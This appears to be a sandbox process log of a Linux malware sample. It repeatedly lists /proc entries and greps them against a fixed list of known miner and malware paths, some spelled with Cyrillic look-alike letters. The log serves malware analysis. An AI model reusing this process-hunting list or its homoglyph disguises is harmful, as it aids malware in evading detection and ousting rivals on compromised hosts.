/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1052
-
-
/bin/grepgrep exe2⤵PID:1057
-
-
/bin/lsls -latrh /proc/722⤵PID:1056
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1061
-
-
/bin/grepgrep exe2⤵PID:1068
-
-
/bin/lsls -latrh /proc/7222⤵PID:1067
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1071
-
-
/bin/grepgrep exe2⤵PID:1075
-
-
/bin/lsls -latrh /proc/7292⤵PID:1074
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1077
-
-
/bin/lsls -latrh /proc/732⤵PID:1081
-
-
/bin/grepgrep exe2⤵PID:1082
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1085
-
-
/bin/grepgrep exe2⤵PID:1088
-
-
/bin/lsls -latrh /proc/7342⤵PID:1087
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1091
-
-
/bin/lsls -latrh /proc/742⤵PID:1093
-
-
/bin/grepgrep exe2⤵PID:1094
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1096
-
-
/bin/grepgrep exe2⤵PID:1099
-
-
/bin/lsls -latrh /proc/752⤵PID:1098
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1102
-
-
/bin/grepgrep exe2⤵PID:1105
-
-
/bin/lsls -latrh /proc/762⤵PID:1104
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1107
-
-
/bin/grepgrep exe2⤵PID:1110
-
-
/bin/lsls -latrh /proc/772⤵PID:1109
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1112
-
-
/bin/lsls -latrh /proc/782⤵PID:1114
-
-
/bin/grepgrep exe2⤵PID:1115
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1117
-
-
/bin/lsls -latrh /proc/82⤵PID:1119
-
-
/bin/grepgrep exe2⤵PID:1120
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1122
-
-
/bin/lsls -latrh /proc/812⤵PID:1124
-
-
/bin/grepgrep exe2⤵PID:1125
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1127
-
-
/bin/grepgrep exe2⤵PID:1130
-
-
/bin/lsls -latrh /proc/832⤵PID:1129
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1132
-
-
/bin/grepgrep exe2⤵PID:1135
-
-
/bin/lsls -latrh /proc/842⤵PID:1134
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1137
-
-
/bin/grepgrep exe2⤵PID:1140
-
-
/bin/lsls -latrh /proc/92⤵PID:1139
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1142
-
-
/bin/grepgrep exe2⤵PID:1145
-
-
/bin/lsls -latrh /proc/buddyinfo2⤵PID:1144
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1147
-
-
/bin/grepgrep exe2⤵PID:1150
-
-
/bin/lsls -latrh /proc/bus2⤵PID:1149
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1152
-
-
/bin/grepgrep exe2⤵PID:1155
-
-
/bin/lsls -latrh /proc/cgroups2⤵PID:1154
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1157
-
-
/bin/grepgrep exe2⤵PID:1160
-
-
/bin/lsls -latrh /proc/cmdline2⤵PID:1159
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1162
-
-
/bin/lsls -latrh /proc/consoles2⤵PID:1164
-
-
/bin/grepgrep exe2⤵PID:1165
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1167
-
-
/bin/lsls -latrh /proc/cpuinfo2⤵PID:1169
-
-
/bin/grepgrep exe2⤵PID:1170
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1172
-
-
/bin/grepgrep exe2⤵PID:1175
-
-
/bin/lsls -latrh /proc/crypto2⤵PID:1174
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1177
-
-
/bin/grepgrep exe2⤵PID:1180
-
-
/bin/lsls -latrh /proc/devices2⤵PID:1179
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1182
-
-
/bin/grepgrep exe2⤵PID:1185
-
-
/bin/lsls -latrh /proc/device-tree2⤵PID:1184
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1187
-
-
/bin/lsls -latrh /proc/diskstats2⤵PID:1189
-
-
/bin/grepgrep exe2⤵PID:1190
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1192
-
-
/bin/lsls -latrh /proc/dma2⤵PID:1194
-
-
/bin/grepgrep exe2⤵PID:1195
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1197
-
-
/bin/lsls -latrh /proc/driver2⤵PID:1199
-
-
/bin/grepgrep exe2⤵PID:1200
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1202
-
-
/bin/grepgrep exe2⤵PID:1205
-
-
/bin/lsls -latrh /proc/execdomains2⤵PID:1204
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1207
-
-
/bin/grepgrep exe2⤵PID:1210
-
-
/bin/lsls -latrh /proc/fb2⤵PID:1209
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1212
-
-
/bin/grepgrep exe2⤵PID:1215
-
-
/bin/lsls -latrh /proc/filesystems2⤵PID:1214
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1217
-
-
/bin/grepgrep exe2⤵PID:1220
-
-
/bin/lsls -latrh /proc/fs2⤵PID:1219
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1222
-
-
/bin/lsls -latrh /proc/interrupts2⤵PID:1224
-
-
/bin/grepgrep exe2⤵PID:1225
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1227
-
-
/bin/grepgrep exe2⤵PID:1230
-
-
/bin/lsls -latrh /proc/iomem2⤵PID:1229
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1232
-
-
/bin/grepgrep exe2⤵PID:1235
-
-
/bin/lsls -latrh /proc/ioports2⤵PID:1234
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1237
-
-
/bin/grepgrep exe2⤵PID:1240
-
-
/bin/lsls -latrh /proc/irq2⤵PID:1239
-
-
